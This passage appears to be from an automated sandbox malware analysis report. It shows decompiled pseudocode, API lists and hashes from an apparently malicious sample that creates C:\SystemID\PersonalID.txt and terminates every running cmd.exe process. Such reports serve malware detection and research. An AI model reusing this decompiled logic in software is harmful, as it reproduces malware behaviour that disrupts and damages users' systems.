                                                                                                    									_t121 = _v32;
                                                                                                    								}
                                                                                                    								__eflags = _t138;
                                                                                                    								if(_t138 != 0) {
                                                                                                    									 *((intOrPtr*)(_t138 + 0x14)) = 7;
                                                                                                    									 *(_t138 + 0x10) = 0;
                                                                                                    									 *_t138 = 0;
                                                                                                    									__eflags = _v36 - 8;
                                                                                                    									if(_v36 >= 8) {
                                                                                                    										 *_t138 = _v56;
                                                                                                    										_v56 = 0;
                                                                                                    									} else {
                                                                                                    										_t109 =  &(_v40->nLength);
                                                                                                    										__eflags = _t109;
                                                                                                    										if(_t109 != 0) {
                                                                                                    											E004205A0(_t138,  &_v56, _t109 + _t109);
                                                                                                    											_t156 = _t156 + 0xc;
                                                                                                    										}
                                                                                                    									}
                                                                                                    									 *(_t138 + 0x10) = _v40;
                                                                                                    									 *((intOrPtr*)(_t138 + 0x14)) = _v36;
                                                                                                    									__eflags = 0;
                                                                                                    									_v36 = 7;
                                                                                                    									_v40 = 0;
                                                                                                    									_v56 = 0;
                                                                                                    								}
                                                                                                    							} else {
                                                                                                    								_t132 = _t101 - _t121;
                                                                                                    								_t135 = 0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2;
                                                                                                    								_t150 = (0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2);
                                                                                                    								if(_t138 == _v24) {
                                                                                                    									E00414F70(_t121,  &_v32, _t138, _t132);
                                                                                                    									_t138 = _v28;
                                                                                                    									_t121 = _v32;
                                                                                                    								}
                                                                                                    								_t117 = _t121 + (_t150 + _t150 * 2) * 8;
                                                                                                    								if(_t138 != 0) {
                                                                                                    									E00413160(_t138, _t117);
                                                                                                    								}
                                                                                                    							}
                                                                                                    							_t138 = _t138 + 0x18;
                                                                                                    							_v8 = 1;
                                                                                                    							_v28 = _t138;
                                                                                                    							if(_v36 >= 8) {
                                                                                                    								L00422587(_v56);
                                                                                                    								_t156 = _t156 + 4;
                                                                                                    							}
                                                                                                    							_t141 = _v24;
                                                                                                    						}
                                                                                                    						L26:
                                                                                                    						_t96 = E00420546(_v20);
                                                                                                    						_t155 = _t156 + 4;
                                                                                                    						_t166 = _t96;
                                                                                                    					} while (_t96 == 0);
                                                                                                    					goto L27;
                                                                                                    				}
                                                                                                    			}












































                                                                                                    0x0040c743
                                                                                                    0x0040c745
                                                                                                    0x0040c750
                                                                                                    0x0040c751
                                                                                                    0x0040c761
                                                                                                    0x0040c768
                                                                                                    0x0040c76a
                                                                                                    0x0040c76c
                                                                                                    0x0040c76f
                                                                                                    0x0040c771
                                                                                                    0x0040c774
                                                                                                    0x0040c781
                                                                                                    0x0040c785
                                                                                                    0x0040c78a
                                                                                                    0x0040c78d
                                                                                                    0x0040c792
                                                                                                    0x0040c911
                                                                                                    0x0040c911
                                                                                                    0x0040c915
                                                                                                    0x0040c944
                                                                                                    0x0040c94b
                                                                                                    0x0040c95b
                                                                                                    0x0040c960
                                                                                                    0x0040c963
                                                                                                    0x0040c968
                                                                                                    0x0040c9af
                                                                                                    0x0040c9b1
                                                                                                    0x0040c9b3
                                                                                                    0x0040c9d8
                                                                                                    0x0040c9d8
                                                                                                    0x0040c9df
                                                                                                    0x0040c9e2
                                                                                                    0x0040c9e6
                                                                                                    0x0040c9e7
                                                                                                    0x0040c9e8
                                                                                                    0x0040c9ed
                                                                                                    0x0040c9ee
                                                                                                    0x0040c9f3
                                                                                                    0x0040c9f8
                                                                                                    0x0040c9f9
                                                                                                    0x0040c9fe
                                                                                                    0x0040ca01
                                                                                                    0x0040ca03
                                                                                                    0x0040ca43
                                                                                                    0x0040ca47
                                                                                                    0x0040ca4c
                                                                                                    0x0040ca51
                                                                                                    0x0040ca59
                                                                                                    0x0040ca64
                                                                                                    0x0040ca64
                                                                                                    0x0040ca05
                                                                                                    0x0040ca07
                                                                                                    0x0040ca09
                                                                                                    0x0040ca3a
                                                                                                    0x0040ca3b
                                                                                                    0x0040ca40
                                                                                                    0x00000000
                                                                                                    0x0040ca40
                                                                                                    0x0040ca10
                                                                                                    0x0040ca10
                                                                                                    0x0040ca14
                                                                                                    0x0040ca18
                                                                                                    0x0040ca1d
                                                                                                    0x0040ca1d
                                                                                                    0x0040ca22
                                                                                                    0x0040ca29
                                                                                                    0x0040ca30
                                                                                                    0x0040ca33
                                                                                                    0x0040ca36
                                                                                                    0x0040ca36
                                                                                                    0x00000000
                                                                                                    0x0040ca10
                                                                                                    0x0040c9b5
                                                                                                    0x0040c9b8
                                                                                                    0x0040c9b8
                                                                                                    0x0040c9bc
                                                                                                    0x0040c9c2
                                                                                                    0x0040c9be
                                                                                                    0x0040c9be
                                                                                                    0x0040c9be
                                                                                                    0x0040c9c4
                                                                                                    0x0040c9c5
                                                                                                    0x0040c9c6
                                                                                                    0x0040c9cb
                                                                                                    0x0040c9ce
                                                                                                    0x0040c9d1
                                                                                                    0x0040c9d1
                                                                                                    0x0040c9d5
                                                                                                    0x00000000
                                                                                                    0x0040c9d5
                                                                                                    0x0040c96a
                                                                                                    0x0040c96c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040c972
                                                                                                    0x0040c976
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040c980
                                                                                                    0x0040c984
                                                                                                    0x0040c988
                                                                                                    0x0040c98d
                                                                                                    0x0040c98d
                                                                                                    0x0040c992
                                                                                                    0x0040c999
                                                                                                    0x0040c9a0
                                                                                                    0x0040c9a3
                                                                                                    0x0040c9a6
                                                                                                    0x00000000
                                                                                                    0x0040c9aa
                                                                                                    0x0040c920
                                                                                                    0x0040c92c
                                                                                                    0x0040c933
                                                                                                    0x0040c93b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040c93d
                                                                                                    0x0040c942
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040c942
                                                                                                    0x00000000
                                                                                                    0x0040c920
                                                                                                    0x0040c799
                                                                                                    0x0040c79e
                                                                                                    0x0040c7a1
                                                                                                    0x0040c7a3
                                                                                                    0x0040c906
                                                                                                    0x0040c906
                                                                                                    0x0040c909
                                                                                                    0x0040c90e
                                                                                                    0x00000000
                                                                                                    0x0040c7b0
                                                                                                    0x0040c7b0
                                                                                                    0x0040c7b0
                                                                                                    0x0040c7b9
                                                                                                    0x0040c7bb
                                                                                                    0x0040c7bc
                                                                                                    0x0040c7c1
                                                                                                    0x0040c7c6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040c7ce
                                                                                                    0x0040c7d5
                                                                                                    0x0040c7dc
                                                                                                    0x0040c7e7
                                                                                                    0x0040c7ed
                                                                                                    0x0040c7f3
                                                                                                    0x0040c7f6
                                                                                                    0x0040c7f6
                                                                                                    0x0040c7f9
                                                                                                    0x0040c7fc
                                                                                                    0x0040c7fc
                                                                                                    0x0040c801
                                                                                                    0x0040c801
                                                                                                    0x0040c803
                                                                                                    0x00000000
                                                                                                    0x0040c7e9
                                                                                                    0x0040c7e9
                                                                                                    0x0040c805
                                                                                                    0x0040c805
                                                                                                    0x0040c80d
                                                                                                    0x0040c810
                                                                                                    0x0040c815
                                                                                                    0x0040c818
                                                                                                    0x0040c81e
                                                                                                    0x0040c861
                                                                                                    0x0040c863
                                                                                                    0x0040c869
                                                                                                    0x0040c86e
                                                                                                    0x0040c871
                                                                                                    0x0040c871
                                                                                                    0x0040c874
                                                                                                    0x0040c876
                                                                                                    0x0040c87a
                                                                                                    0x0040c881
                                                                                                    0x0040c888
                                                                                                    0x0040c88b
                                                                                                    0x0040c88f
                                                                                                    0x0040c8ac
                                                                                                    0x0040c8ae
                                                                                                    0x0040c891
                                                                                                    0x0040c894
                                                                                                    0x0040c894
                                                                                                    0x0040c895
                                                                                                    0x0040c89f
                                                                                                    0x0040c8a4
                                                                                                    0x0040c8a4
                                                                                                    0x0040c895
                                                                                                    0x0040c8b8
                                                                                                    0x0040c8be
                                                                                                    0x0040c8c1
                                                                                                    0x0040c8c3
                                                                                                    0x0040c8ca
                                                                                                    0x0040c8d1
                                                                                                    0x0040c8d1
                                                                                                    0x0040c824
                                                                                                    0x0040c82b
                                                                                                    0x0040c82f
                                                                                                    0x0040c837
                                                                                                    0x0040c83c
                                                                                                    0x0040c842
                                                                                                    0x0040c847
                                                                                                    0x0040c84a
                                                                                                    0x0040c84a
                                                                                                    0x0040c850
                                                                                                    0x0040c855
                                                                                                    0x0040c85a
                                                                                                    0x0040c85a
                                                                                                    0x0040c855
                                                                                                    0x0040c8d5
                                                                                                    0x0040c8d8
                                                                                                    0x0040c8e0
                                                                                                    0x0040c8e3
                                                                                                    0x0040c8e8
                                                                                                    0x0040c8ed
                                                                                                    0x0040c8ed
                                                                                                    0x0040c8f0
                                                                                                    0x0040c8f0
                                                                                                    0x0040c8f3
                                                                                                    0x0040c8f6
                                                                                                    0x0040c8fb
                                                                                                    0x0040c8fe
                                                                                                    0x0040c8fe
                                                                                                    0x00000000
                                                                                                    0x0040c7b0

                                                                                                    APIs
                                                                                                      • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                                    • _fgetws.LIBCMT ref: 0040C7BC
                                                                                                    • _memmove.LIBCMT ref: 0040C89F
                                                                                                    • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                    • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                    • API String ID: 2864494435-54166481
                                                                                                    • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                    • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                                                                                    • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                    • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 86%
                                                                                                    			E00412440() {
                                                                                                    				char _v524;
                                                                                                    				long _v552;
                                                                                                    				void* _v560;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				int _t8;
                                                                                                    				int _t11;
                                                                                                    				void* _t17;
                                                                                                    				void* _t18;
                                                                                                    				void* _t19;
                                                                                                    				void* _t21;
                                                                                                    
                                                                                                    				_t18 = CreateToolhelp32Snapshot(0xf, 0);
                                                                                                    				_v560 = 0x22c;
                                                                                                    				_push( &_v560);
                                                                                                    				_t8 = Process32FirstW(_t18);
                                                                                                    				_t17 = CloseHandle;
                                                                                                    				if(_t8 == 0) {
                                                                                                    					L7:
                                                                                                    					return CloseHandle(_t18);
                                                                                                    				}
                                                                                                    				_push(_t19);
                                                                                                    				do {
                                                                                                    					_t11 = E00420235(_t17, _t18, _t19,  &_v524, L"cmd.exe");
                                                                                                    					_t21 = _t21 + 8;
                                                                                                    					if(_t11 == 0) {
                                                                                                    						_t19 = OpenProcess(1, _t11, _v552);
                                                                                                    						if(_t19 != 0) {
                                                                                                    							TerminateProcess(_t19, 9);
                                                                                                    							CloseHandle(_t19);
                                                                                                    						}
                                                                                                    					}
                                                                                                    				} while (Process32NextW(_t18,  &_v560) != 0);
                                                                                                    				goto L7;
                                                                                                    			}















                                                                                                    0x00412455
                                                                                                    0x00412457
                                                                                                    0x00412467
                                                                                                    0x00412469
                                                                                                    0x0041246f
                                                                                                    0x00412477
                                                                                                    0x004124cc
                                                                                                    0x004124d4
                                                                                                    0x004124d4
                                                                                                    0x00412479
                                                                                                    0x00412480
                                                                                                    0x0041248c
                                                                                                    0x00412491
                                                                                                    0x00412496
                                                                                                    0x004124a7
                                                                                                    0x004124ab
                                                                                                    0x004124b0
                                                                                                    0x004124b7
                                                                                                    0x004124b7
                                                                                                    0x004124ab
                                                                                                    0x004124c7
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                                    • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                    • String ID: cmd.exe
                                                                                                    • API String ID: 2696918072-723907552
                                                                                                    • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                                    • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                                    • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                                    • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 83%
                                                                                                    			E0040F310(void* __edi, void* __esi, char _a4, signed int _a20, intOrPtr _a24) {
                                                                                                    				signed int _v8;
                                                                                                    				intOrPtr _v16;
                                                                                                    				char _v20;
                                                                                                    				intOrPtr _v28;
                                                                                                    				char _v32;
                                                                                                    				intOrPtr _v36;
                                                                                                    				signed int _v40;
                                                                                                    				short _v56;
                                                                                                    				intOrPtr _v60;
                                                                                                    				signed int _v64;
                                                                                                    				short _v80;
                                                                                                    				intOrPtr _v84;
                                                                                                    				signed int _v88;
                                                                                                    				char _v104;
                                                                                                    				void* __ebx;
                                                                                                    				void* __ebp;
                                                                                                    				_Unknown_base(*)()* _t147;
                                                                                                    				void* _t169;
                                                                                                    				void* _t173;
                                                                                                    				void* _t177;
                                                                                                    				void* _t195;
                                                                                                    				void* _t203;
                                                                                                    				struct HINSTANCE__* _t221;
                                                                                                    				signed int _t222;
                                                                                                    				void* _t233;
                                                                                                    				void* _t235;
                                                                                                    				signed int _t238;
                                                                                                    				short _t260;
                                                                                                    				char _t261;
                                                                                                    				intOrPtr _t266;
                                                                                                    				void* _t267;
                                                                                                    				void* _t268;
                                                                                                    				void* _t269;
                                                                                                    
                                                                                                    				_push(0xffffffff);
                                                                                                    				_push(0x4caa98);
                                                                                                    				_push( *[fs:0x0]);
                                                                                                    				 *[fs:0x0] = _t266;
                                                                                                    				_t267 = _t266 - 0x58;
                                                                                                    				_v8 = 0;
                                                                                                    				_t221 = LoadLibraryW(L"Shell32.dll");
                                                                                                    				if(_t221 != 0) {
                                                                                                    					_t147 = GetProcAddress(_t221, "SHGetFolderPathW");
                                                                                                    					_t259 = _t147;
                                                                                                    					E00413A90(_t221,  &_v32, __edi, 0x400);
                                                                                                    					_v8 = 1;
                                                                                                    					_t254 = _v32;
                                                                                                    					 *_t147(0, 0x28, 0, 0, _v32, __edi, __esi);
                                                                                                    					_push(_v20);
                                                                                                    					_v36 = 7;
                                                                                                    					_v40 = 0;
                                                                                                    					_v56 = 0;
                                                                                                    					E00418400( &_v56, _v32, _v28);
                                                                                                    					_v8 = 2;
                                                                                                    					_push(1);
                                                                                                    					_v84 = 7;
                                                                                                    					_v88 = 0;
                                                                                                    					_v104 = 0;
                                                                                                    					E00415C10(_t221,  &_v104, _t254, _t147, "\\");
                                                                                                    					_v8 = 3;
                                                                                                    					_push(1);
                                                                                                    					_v60 = 7;
                                                                                                    					_v64 = 0;
                                                                                                    					_v80 = 0;
                                                                                                    					E00415C10(_t221,  &_v80, _t254, _t147, "/");
                                                                                                    					_v8 = 4;
                                                                                                    					E0040F2B0( &_v56,  &_v80,  &_v104);
                                                                                                    					_t268 = _t267 + 4;
                                                                                                    					if(_v60 >= 8) {
                                                                                                    						L00422587(_v80);
                                                                                                    						_t268 = _t268 + 4;
                                                                                                    					}
                                                                                                    					_v8 = 2;
                                                                                                    					_v60 = 7;
                                                                                                    					_v64 = 0;
                                                                                                    					_v80 = 0;
                                                                                                    					if(_v84 >= 8) {
                                                                                                    						L00422587(_v104);
                                                                                                    						_t268 = _t268 + 4;
                                                                                                    					}
                                                                                                    					_push(1);
                                                                                                    					_v84 = 7;
                                                                                                    					_v88 = 0;
                                                                                                    					_v104 = 0;
                                                                                                    					E00415C10(_t221,  &_v104, _t254, _t259, "\\");
                                                                                                    					_v8 = 5;
                                                                                                    					_push(1);
                                                                                                    					_v60 = 7;
                                                                                                    					_v64 = 0;
                                                                                                    					_v80 = 0;
                                                                                                    					E00415C10(_t221,  &_v80, _t254, _t259, "/");
                                                                                                    					_v8 = 6;
                                                                                                    					E0040F2B0( &_a4,  &_v80,  &_v104);
                                                                                                    					_t269 = _t268 + 4;
                                                                                                    					if(_v60 >= 8) {
                                                                                                    						L00422587(_v80);
                                                                                                    						_t269 = _t269 + 4;
                                                                                                    					}
                                                                                                    					_v8 = 2;
                                                                                                    					_v60 = 7;
                                                                                                    					_v64 = 0;
                                                                                                    					_v80 = 0;
                                                                                                    					if(_v84 >= 8) {
                                                                                                    						L00422587(_v104);
                                                                                                    						_t269 = _t269 + 4;
                                                                                                    					}
                                                                                                    					_t260 = _v56;
                                                                                                    					_t167 =  >=  ? _t260 :  &_v56;
                                                                                                    					_t233 =  >=  ? _t260 :  &_v56;
                                                                                                    					_v20 =  >=  ? _t260 :  &_v56;
                                                                                                    					_t250 =  >=  ? _t260 :  &_v56;
                                                                                                    					_t169 = _t233 + _v40 * 2;
                                                                                                    					__eflags = ( >=  ? _t260 :  &_v56) - _t169;
                                                                                                    					if(( >=  ? _t260 :  &_v56) != _t169) {
                                                                                                    						_push(_t233);
                                                                                                    						E00418380( &_v20, _t250, _t169, _v20);
                                                                                                    						_t269 = _t269 + 0xc;
                                                                                                    					}
                                                                                                    					_t261 = _a4;
                                                                                                    					_t171 =  >=  ? _t261 :  &_a4;
                                                                                                    					_t235 =  >=  ? _t261 :  &_a4;
                                                                                                    					_v20 =  >=  ? _t261 :  &_a4;
                                                                                                    					_t252 =  >=  ? _t261 :  &_a4;
                                                                                                    					_t173 = _t235 + _a20 * 2;
                                                                                                    					__eflags = ( >=  ? _t261 :  &_a4) - _t173;
                                                                                                    					if(( >=  ? _t261 :  &_a4) != _t173) {
                                                                                                    						_push(_t235);
                                                                                                    						E00418380( &_v20, _t252, _t173, _v20);
                                                                                                    						_t269 = _t269 + 0xc;
                                                                                                    					}
                                                                                                    					_t267 = _t269 - 8;
                                                                                                    					_v20 = 0x5c;
                                                                                                    					if(E00414D40( &_v56,  &_v20) != 0xffffffff) {
                                                                                                    						_t177 = E00413520( &_v56,  &_v104, 0, _t175);
                                                                                                    						_t262 = _t177;
                                                                                                    						if( &_v56 != _t177) {
                                                                                                    							if(_v36 >= 8) {
                                                                                                    								L00422587(_v56);
                                                                                                    								_t267 = _t267 + 4;
                                                                                                    							}
                                                                                                    							_v36 = 7;
                                                                                                    							_v40 = 0;
                                                                                                    							_v56 = 0;
                                                                                                    							E004145A0( &_v56, _t262);
                                                                                                    						}
                                                                                                    						if(_v84 >= 8) {
                                                                                                    							L00422587(_v104);
                                                                                                    							_t267 = _t267 + 4;
                                                                                                    						}
                                                                                                    						_t238 = _v40;
                                                                                                    						_t180 =  >=  ? _v56 :  &_v56;
                                                                                                    						if( *((short*)(( >=  ? _v56 :  &_v56) + _t238 * 2 - 2)) == 0x5c) {
                                                                                                    							_t97 = _t238 - 1; // -1
                                                                                                    							_t203 = E00413520( &_v56,  &_v104, 0, _t97);
                                                                                                    							_t265 = _t203;
                                                                                                    							if( &_v56 != _t203) {
                                                                                                    								if(_v36 >= 8) {
                                                                                                    									L00422587(_v56);
                                                                                                    									_t267 = _t267 + 4;
                                                                                                    								}
                                                                                                    								_v36 = 7;
                                                                                                    								_v40 = 0;
                                                                                                    								_v56 = 0;
                                                                                                    								E004145A0( &_v56, _t265);
                                                                                                    							}
                                                                                                    							if(_v84 >= 8) {
                                                                                                    								L00422587(_v104);
                                                                                                    								_t267 = _t267 + 4;
                                                                                                    							}
                                                                                                    						}
                                                                                                    						_t239 = _a20;
                                                                                                    						_t182 =  >=  ? _a4 :  &_a4;
                                                                                                    						if( *((short*)(( >=  ? _a4 :  &_a4) + _a20 * 2 - 2)) == 0x5c) {
                                                                                                    							_t239 =  &_a4;
                                                                                                    							_t195 = E00413520( &_a4,  &_v104, 0,  &_a4 - 1);
                                                                                                    							_t264 = _t195;
                                                                                                    							if( &_a4 != _t195) {
                                                                                                    								if(_a24 >= 8) {
                                                                                                    									L00422587(_a4);
                                                                                                    									_t267 = _t267 + 4;
                                                                                                    								}
                                                                                                    								_a24 = 7;
                                                                                                    								_t239 =  &_a4;
                                                                                                    								_a20 = 0;
                                                                                                    								_a4 = 0;
                                                                                                    								E004145A0( &_a4, _t264);
                                                                                                    							}
                                                                                                    							if(_v84 >= 8) {
                                                                                                    								L00422587(_v104);
                                                                                                    								_t267 = _t267 + 4;
                                                                                                    							}
                                                                                                    						}
                                                                                                    						FreeLibrary(_t221);
                                                                                                    						_t185 =  >=  ? _a4 :  &_a4;
                                                                                                    						_t222 = _t221 & 0xffffff00 | E00417F00( &_v56, _t239, _v40,  >=  ? _a4 :  &_a4, _a20) == 0x00000000;
                                                                                                    					} else {
                                                                                                    						FreeLibrary(_t221);
                                                                                                    						_t222 = 0;
                                                                                                    					}
                                                                                                    					if(_v36 >= 8) {
                                                                                                    						L00422587(_v56);
                                                                                                    						_t267 = _t267 + 4;
                                                                                                    					}
                                                                                                    					_v36 = 7;
                                                                                                    					_v56 = 0;
                                                                                                    					_t188 = _v32;
                                                                                                    					_v40 = 0;
                                                                                                    					if(_v32 != 0) {
                                                                                                    						L00422587(_t188);
                                                                                                    						_t267 = _t267 + 4;
                                                                                                    					}
                                                                                                    					goto L41;
                                                                                                    				} else {
                                                                                                    					_t222 = 0;
                                                                                                    					L41:
                                                                                                    					if(_a24 >= 8) {
                                                                                                    						L00422587(_a4);
                                                                                                    					}
                                                                                                    					 *[fs:0x0] = _v16;
                                                                                                    					return _t222;
                                                                                                    				}
                                                                                                    			}




































                                                                                                    0x0040f313
                                                                                                    0x0040f315
                                                                                                    0x0040f320
                                                                                                    0x0040f321
                                                                                                    0x0040f328
                                                                                                    0x0040f331
                                                                                                    0x0040f33e
                                                                                                    0x0040f342
                                                                                                    0x0040f353
                                                                                                    0x0040f361
                                                                                                    0x0040f363
                                                                                                    0x0040f368
                                                                                                    0x0040f36c
                                                                                                    0x0040f378
                                                                                                    0x0040f37a
                                                                                                    0x0040f37f
                                                                                                    0x0040f38c
                                                                                                    0x0040f394
                                                                                                    0x0040f398
                                                                                                    0x0040f39d
                                                                                                    0x0040f3a4
                                                                                                    0x0040f3a8
                                                                                                    0x0040f3b4
                                                                                                    0x0040f3bb
                                                                                                    0x0040f3bf
                                                                                                    0x0040f3c4
                                                                                                    0x0040f3cb
                                                                                                    0x0040f3cf
                                                                                                    0x0040f3db
                                                                                                    0x0040f3e2
                                                                                                    0x0040f3e6
                                                                                                    0x0040f3ee
                                                                                                    0x0040f3f9
                                                                                                    0x0040f3fe
                                                                                                    0x0040f405
                                                                                                    0x0040f40a
                                                                                                    0x0040f40f
                                                                                                    0x0040f40f
                                                                                                    0x0040f414
                                                                                                    0x0040f41c
                                                                                                    0x0040f423
                                                                                                    0x0040f42a
                                                                                                    0x0040f42e
                                                                                                    0x0040f433
                                                                                                    0x0040f438
                                                                                                    0x0040f438
                                                                                                    0x0040f43b
                                                                                                    0x0040f43f
                                                                                                    0x0040f44e
                                                                                                    0x0040f455
                                                                                                    0x0040f459
                                                                                                    0x0040f45e
                                                                                                    0x0040f465
                                                                                                    0x0040f469
                                                                                                    0x0040f475
                                                                                                    0x0040f47c
                                                                                                    0x0040f480
                                                                                                    0x0040f488
                                                                                                    0x0040f493
                                                                                                    0x0040f498
                                                                                                    0x0040f49f
                                                                                                    0x0040f4a4
                                                                                                    0x0040f4a9
                                                                                                    0x0040f4a9
                                                                                                    0x0040f4ae
                                                                                                    0x0040f4b6
                                                                                                    0x0040f4bd
                                                                                                    0x0040f4c4
                                                                                                    0x0040f4c8
                                                                                                    0x0040f4cd
                                                                                                    0x0040f4d2
                                                                                                    0x0040f4d2
                                                                                                    0x0040f4db
                                                                                                    0x0040f4e7
                                                                                                    0x0040f4ea
                                                                                                    0x0040f4ed
                                                                                                    0x0040f4f0
                                                                                                    0x0040f4f6
                                                                                                    0x0040f4f9
                                                                                                    0x0040f4fb
                                                                                                    0x0040f4fd
                                                                                                    0x0040f505
                                                                                                    0x0040f50a
                                                                                                    0x0040f50a
                                                                                                    0x0040f513
                                                                                                    0x0040f51f
                                                                                                    0x0040f522
                                                                                                    0x0040f525
                                                                                                    0x0040f528
                                                                                                    0x0040f52e
                                                                                                    0x0040f531
                                                                                                    0x0040f533
                                                                                                    0x0040f535
                                                                                                    0x0040f53d
                                                                                                    0x0040f542
                                                                                                    0x0040f542
                                                                                                    0x0040f545
                                                                                                    0x0040f548
                                                                                                    0x0040f55e
                                                                                                    0x0040f578
                                                                                                    0x0040f57d
                                                                                                    0x0040f584
                                                                                                    0x0040f58a
                                                                                                    0x0040f58f
                                                                                                    0x0040f594
                                                                                                    0x0040f594
                                                                                                    0x0040f599
                                                                                                    0x0040f5a4
                                                                                                    0x0040f5ab
                                                                                                    0x0040f5af
                                                                                                    0x0040f5af
                                                                                                    0x0040f5b8
                                                                                                    0x0040f5bd
                                                                                                    0x0040f5c2
                                                                                                    0x0040f5c2
                                                                                                    0x0040f5cc
                                                                                                    0x0040f5cf
                                                                                                    0x0040f5d9
                                                                                                    0x0040f5db
                                                                                                    0x0040f5e8
                                                                                                    0x0040f5ed
                                                                                                    0x0040f5f4
                                                                                                    0x0040f5fa
                                                                                                    0x0040f5ff
                                                                                                    0x0040f604
                                                                                                    0x0040f604
                                                                                                    0x0040f609
                                                                                                    0x0040f614
                                                                                                    0x0040f61b
                                                                                                    0x0040f61f
                                                                                                    0x0040f61f
                                                                                                    0x0040f628
                                                                                                    0x0040f62d
                                                                                                    0x0040f632
                                                                                                    0x0040f632
                                                                                                    0x0040f628
                                                                                                    0x0040f63c
                                                                                                    0x0040f63f
                                                                                                    0x0040f649
                                                                                                    0x0040f655
                                                                                                    0x0040f658
                                                                                                    0x0040f65d
                                                                                                    0x0040f664
                                                                                                    0x0040f66a
                                                                                                    0x0040f66f
                                                                                                    0x0040f674
                                                                                                    0x0040f674
                                                                                                    0x0040f679
                                                                                                    0x0040f681
                                                                                                    0x0040f684
                                                                                                    0x0040f68b
                                                                                                    0x0040f68f
                                                                                                    0x0040f68f
                                                                                                    0x0040f698
                                                                                                    0x0040f69d
                                                                                                    0x0040f6a2
                                                                                                    0x0040f6a2
                                                                                                    0x0040f698
                                                                                                    0x0040f6a6
                                                                                                    0x0040f6b6
                                                                                                    0x0040f6c9
                                                                                                    0x0040f560
                                                                                                    0x0040f561
                                                                                                    0x0040f567
                                                                                                    0x0040f567
                                                                                                    0x0040f6d2
                                                                                                    0x0040f6d7
                                                                                                    0x0040f6dc
                                                                                                    0x0040f6dc
                                                                                                    0x0040f6e1
                                                                                                    0x0040f6e8
                                                                                                    0x0040f6ec
                                                                                                    0x0040f6ef
                                                                                                    0x0040f6f8
                                                                                                    0x0040f6fb
                                                                                                    0x0040f700
                                                                                                    0x0040f700
                                                                                                    0x00000000
                                                                                                    0x0040f344
                                                                                                    0x0040f344
                                                                                                    0x0040f703
                                                                                                    0x0040f707
                                                                                                    0x0040f70c
                                                                                                    0x0040f711
                                                                                                    0x0040f71a
                                                                                                    0x0040f724
                                                                                                    0x0040f724

                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
